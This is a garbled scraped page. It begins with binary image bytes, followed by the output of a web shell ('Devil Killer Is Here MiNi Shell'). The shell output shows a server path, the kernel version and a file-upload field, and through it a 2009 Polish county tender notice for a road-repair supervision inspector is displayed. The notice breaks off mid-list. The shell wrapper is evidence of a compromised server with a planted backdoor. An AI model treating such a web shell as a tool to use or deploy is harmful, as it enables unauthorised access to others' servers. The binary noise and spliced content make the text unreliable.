JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090730/260696-N-2009.html

<p class="kh_header"><b>Zgierz: Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Remont drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie oraz nad zadaniem pn. Remont drogi powiatowej Nr 5137 E relacji Ozorków - Parzęczew- granica powiatu Łążki - 2 zadania.</b><br>
<b>Numer ogłoszenia: 260696 - 2009; data zamieszczenia: 30.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Zgierskiego , ul. Sadowa 6A, 95-100 Zgierz, woj. łódzkie, tel. 042 7190885, faks 042 7190816.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Remont drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie oraz nad zadaniem pn. Remont drogi powiatowej Nr 5137 E relacji Ozorków - Parzęczew- granica powiatu Łążki - 2 zadania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru nad zadaniem pn.  Remont drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie oraz nad zadaniem pn. Remont drogi powiatowej Nr 51 37 E relacji Ozorków - Parzęczew - granica powiatu  Łążki - 2 zadania
1.Zamawiający dopuszcza składanie ofert częściowych, gdzie część (zadanie) stanowi:
Zadanie częściowe nr:	Opis:
1Temat: Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn.   Remont drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie
Wspólny Słownik Zamówień: 71521000-6 
Opis: Przedmiotem zamówienia są roboty budowlane polegające na remoncie drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie. 
Charakterystyka nadzorowanej inwestycji:
W skład robót wchodzą roboty budowlane polegające na:
a)wykonaniu  i odbiorze robót związanych z oczyszczeniem i skropieniem warstw konstrukcyjnych nawierzchni  na powierzchni 7125,00 m2, w pasie drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie,
b)wykonaniu  i odbiorze robót związanych z wykonaniem wyrównania poprzecznego i podłużnego podbudowy mieszankami mineralno-asfaltowymi, w ilości 50 kg/m2, w pasie drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie.
c)wykonaniu  i odbiorze robót związanych z wykonywaniem warstw konstrukcji (warstwa ścieralna gr. 3,0 cm) nawierzchni z betonu asfaltowego, na powierzchni 7125,00 m2, w pasie drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie.
Szczegółowe wymagania dotyczące realizacji roboty budowlanej zawarte są 
w Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych wymienionych poniżej:
Załącznik nr 6 do SIWZ
OST- Wymagania ogólne D - M - 00.00.00,
OST- Oczyszczenie  i  skropienie warstw  konstrukcyjnych D-04.03.01,
OST- Wyrównanie podbudowy D - 04.08.00,
OST -Nawierzchnia z betonu asfaltowego D-05.03.05,
Załącznik nr 7 do SIWZ
SST-1 - Oczyszczanie i skropienie warstw konstrukcyjnych D-04.03.01,
SST-3- Wyrównanie podbudowy mieszankami mineralno-asfaltowymi D-04.08.01,
SST-2- Nawierzchnia z betonu asfaltowego D-05.03.05,
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi.
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
1.Wykonawca zobowiązany jest do: 
1)przejęcia od zamawiającego kompletnej dokumentacji technicznej w zakresie umożliwiającym prawidłowe sprawowanie nadzoru inwestorskiego;
2)udziału w czynnościach przekazania wykonawcy Inwestycji terenu inwestorskich;
3)Zakres podstawowych obowiązków i praw inspektora nadzoru wynika z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U.z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
a)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową
 i pozwoleniem budowlanym, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
b)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
c)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
d)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
e)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział  w czynnościach odbioru robót,
f)potwierdzanie ilości wykonanych robót,
g)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
h)sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
i)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
j)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
4)udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.
2.Na wykonanie usługi w sposób odbiegający od dokumentacji technicznej lub podejmowanie innych działań przez wykonawcę robót, wpływających na wzrost wartości usługi potrzebna jest pisemna zgoda Zamawiającego.
3.Zamawiający wymaga, aby Wykonawca był przedsiębiorcą w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
4.Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
5.Zleceniobiorca ponosi odpowiedzialność za szkody wyrządzone na skutek nie wykonania lub nienależytego wykonania czynności objętych umową, ocenianego w granicach przewidzianych dla umów starannego działania.
2Temat: Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Remont drogi powiatowej Nr 5137 E relacji Ozorków - Parzęczew - granica powiatu Łążki Wspólny Słownik Zamówień:  71521000-6
Opis: Przedmiotem zamówienia jest robota budowlana polegająca na wykonaniu remontu na drodze powiatowej Nr 5137 E  relacji Ozorków - Parzęczew - granica powiatu Łążki, CPV. 45.23.32.20-7.
Charakterystyka nadzorowanej inwestycji:
Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu remontu na drodze powiatowej Nr 5137 E  relacji Ozorków - Parzęczew - granica powiatu Łążki, 
1.Realizacja przedmiotu zamówienia obejmuje:
1)mechaniczne oczyszczenie i skropienie emulsją asfaltową istniejącej nawierzchni bitumicznej, na powierzchni 3300,00 m2,
2)wyrównanie istniejącej podbudowy mieszanką mineralno - bitumiczną asfaltową mechanicznie w ilości 50 kg/m2,
3)wykonanie nawierzchni z mieszanek mineralno - bitumicznych asfaltowych 
o grubości 3 cm, na powierzchni 3300 m2,
4)obustronne plantowanie terenu szer. 1,0 m, na powierzchni 1200 m2.
2.Wymagania szczegółowe dotyczące wykonania i odbioru robót objętych przedmiotem zamówienia zawarte są w: 
1)Ogólnych Specyfikacjach Technicznych (OST) D -00.00.00. Wymagania ogólne, które stanowią załącznik Nr 8 do SIWZ,
2)Ogólnych Specyfikacjach Technicznych (OST) D 04.08.00 Wyrównanie podbudowy, które stanowią załącznik Nr 9 do SIWZ,
3)Ogólnych Specyfikacjach Technicznych (OST) D 05.03.05 Nawierzchnia z betonu asfaltowego, które stanowią załącznik Nr  10 do SIWZ,
4)Ogólnych Specyfikacjach Technicznych (OST) D -04.03.01. Oczyszczenie i skropienie warstw konstrukcyjnych, które stanowią załącznik Nr 11 do SIWZ,
5)Szczegółowych Specyfikacjach Technicznych (SST) D-04.03.01 Oczyszczenie i skropienie warstw konstrukcyjnych, które stanowią załącznik Nr 12 do SIWZ,
6)Szczegółowych Specyfikacjach Technicznych (SST) D-04.08.01 Wyrównanie podbudowy mieszankami mineralno - asfaltowymi, które stanowią załącznik Nr 13 do SIWZ.
7)Szczegółowych Specyfikacjach Technicznych (SST) D-05.03.05 Nawierzchnia z betonu asfaltowego, które stanowią załącznik Nr 14 do SIWZ.
3.Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi.
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
Zakres podstawowych obowiązków i praw inspektora nadzoru wynika 
z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U. Z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
1)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową 
i pozwoleniem budowlanym, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
2)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów 
3)urządzeń, zgłaszanych przez wykonawcę robót, szczególnie 
w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
4)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a w szczególności zapobieganie zastosowaniu wyrobów i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
5)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
6)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział 
w czynnościach odbioru robót,
7)potwierdzanie ilości wykonanych robót,
8)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
9)sprawdzanie rozliczeń Wykonawcy robót budowlanych 
i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
10)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
11)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
Zamawiający wymaga, aby Wykonawca był przedsiębiorcą w rozumieniu przepisów ustawy  z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo Zamówień Publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, z późn. zm.), oraz spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych.
Lp:Warunek do spełnienia i sposób dokonywania jego oceny:
1Sytuacja podmiotowa wykonawcy
Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych
2Zdolność techniczna
Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
Ocena spełnienia warunków udziału w Postępowaniu zostanie dokonana metodą spełnia/nie spełnia na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń składających się na ofertę, wg wymogów zawartych w pkt 10 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy dołączyć następujące dokumenty i oświadczenia:
Lp:Nazwa dokumentu potwierdzającego:Wymagany dokument:
Nr załącznika do SIWZ
1Aktualny odpis z właściwego rejestru	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert	
2Potwierdzenie posiadanych uprawnień
Wykaz osób uczestniczących w wykonywaniu zamówienia którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.
UWAGA: 
Wykonawcy oferujący wykonanie zadania Nr 1 i zadania Nr 2 opracowują przedmiotowy załącznik odrębnie dla każdego zadania. 	1.1.1	Wymagane dysponowanie osobami: które będą wykonywać zamówienie, posiadającymi uprawnienia do nadzorowania i kierowania robotami budowlanymi w specjalności konstrukcyjno-inżynieryjnej w zakresie budowy dróg - minimum 1 osoba; Do wykazu należy załączyć dokumenty stwierdzające, że wskazane przez Wykonawcę osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają uprawnienia budowlane  - drogowe w specjalności konstrukcyjno - inżynieryjnej 
w zakresie budowy dróg (zgodnie z art. 12 ust. 1 i 2 ustawy - Prawo budowlane)wystawione przez podmioty uprawnione  oraz aktualne zaświadczenie o przynależności tych osób do Okręgowej Izby Inżynierów Budowlanych.
4A,4 B
3Zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób uczestniczących w wykonywaniu zamówienia wykonawca wskazał osoby, którymi będzie dysponował
4Oświadczenie z art. 22 i 24	Oświadczenie z art. 22 i 24	3
5 Zakres usług zlecanych podwykonawcom
UWAGA: 
Wykonawcy oferujący wykonanie zadania Nr 1 i zadania Nr 2 opracowują przedmiotowy załącznik odrębnie dla każdego zadania.Oświadczenie w którym Wykonawca określi zakres usług zlecanych ewentualnym podwykonawcom 	5 A
5 B
* - Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast przedmiotowych dokumentów, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono jego upadłości,
b)nie zalega z uiszczaniem podatków, opłat oraz składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty, o których mowa w a i c., powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, lit. b nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
** Oświadczenie o spełnianiu warunków udziału w postępowaniu - wykonawca składa tylko jedno oświadczenie na potwierdzenie każdego warunku..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.starostwo.zgierz.pl/przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (cena 42,40 zł) można odebrać w siedzibie Zamawiającego w Starostwie Powiatowym w Zgierzu przy ul. Sadowej 6A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2009 godzina 11:00, miejsce: Oferty należy składać w Starostwie Powiatowym w Zgierzu; 95-100 Zgierz, ul. Sadowa 6A w pok. 112.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Remont drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis: Przedmiotem zamówienia są roboty budowlane polegające na remoncie drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie. 
Charakterystyka nadzorowanej inwestycji:
W skład robót wchodzą roboty budowlane polegające na:
a)wykonaniu  i odbiorze robót związanych z oczyszczeniem i skropieniem warstw konstrukcyjnych nawierzchni  na powierzchni 7125,00 m2, w pasie drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie,
b) wykonaniu  i odbiorze robót związanych z wykonaniem wyrównania poprzecznego i podłużnego podbudowy mieszankami mineralno-asfaltowymi, w ilości 50 kg/m2, w pasie drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych   w Parzęczewie.
c)wykonaniu  i odbiorze robót związanych z wykonywaniem warstw konstrukcji (warstwa ścieralna gr. 3,0 cm) nawierzchni z betonu asfaltowego, na powierzchni 7125,00 m2, w pasie drogi powiatowej Nr 5168 E na wysokości zrekultywowanego wysypiska odpadów stałych w Parzęczewie.
Szczegółowe wymagania dotyczące realizacji roboty budowlanej zawarte są 
w Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych wymienionych poniżej:
Załącznik nr 6 do SIWZ
OST- Wymagania ogólne D - M - 00.00.00,
OST- Oczyszczenie  i  skropienie warstw  konstrukcyjnych D-04.03.01,
OST- Wyrównanie podbudowy D - 04.08.00,
OST -Nawierzchnia z betonu asfaltowego D-05.03.05,
Załącznik nr 7 do SIWZ
SST-1 - Oczyszczanie i skropienie warstw konstrukcyjnych D-04.03.01,
SST-3- Wyrównanie podbudowy mieszankami mineralno-asfaltowymi D-04.08.01,
SST-2- Nawierzchnia z betonu asfaltowego D-05.03.05,
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi.
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
1.Wykonawca zobowiązany jest do: 
1)przejęcia od zamawiającego kompletnej dokumentacji technicznej w zakresie umożliwiającym prawidłowe sprawowanie nadzoru inwestorskiego;
2)udziału w czynnościach przekazania wykonawcy Inwestycji terenu inwestorskich;
3)Zakres podstawowych obowiązków i praw inspektora nadzoru wynika z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U. z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
a)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową
 i pozwoleniem budowlanym, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
b)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
c)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
d)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
e)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział w czynnościach odbioru robót,
